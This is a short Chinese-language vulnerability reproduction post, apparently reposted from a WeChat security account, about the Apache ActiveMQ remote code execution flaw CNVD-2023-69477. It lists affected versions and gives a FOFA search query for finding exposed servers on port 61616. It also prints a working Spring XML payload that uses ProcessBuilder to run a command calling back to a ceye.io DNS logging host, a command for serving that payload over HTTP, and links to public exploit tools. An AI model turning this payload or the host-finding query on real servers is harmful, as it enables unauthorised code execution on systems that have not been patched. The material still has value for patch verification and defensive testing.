影响版本:
5.18.0<=Apache ActiveMQ<5.18.3
5.17.0<=Apache ActiveMQ<5.17.6
5.16.0<=Apache ActiveMQ<5.16.7
5.15.0<=Apache ActiveMQ<5.15.15
fofa搜索语法:
app="APACHE-ActiveMQ" && port="61616"
漏洞复现:
将poc.xml上传到vps
dns平台:ceye.io
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg><list><value>ping</value><value>co44bq.ceye.io</value></list></constructor-arg></bean></beans>
使用python启动http服务
python3 -m http.server 8989![[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477](http://cn-sec.com/wp-content/uploads/2023/10/6-1698478545.png "[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477")
漏洞工具利用 https://github.com/X1r0z/ActiveMQ-RCE
![[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477](http://cn-sec.com/wp-content/uploads/2023/10/6-1698478546.png "[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477")
dns平台也接收到请求
![[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477](http://cn-sec.com/wp-content/uploads/2023/10/7-1698478546.png "[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477")
漏洞利用工具:
https://github.com/Fw-fW-fw/activemq_Throwable https://github.com/sincere9/Apache-ActiveMQ-RCE https://github.com/X1r0z/ActiveMQ-RCE
漏洞分析:
https://paper.seebug.org/3058/ https://mp.weixin.qq.com/s/4n7vyeXLtim0tXcjnSWDAw
原文始发于微信公众号(安全逐梦人):[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论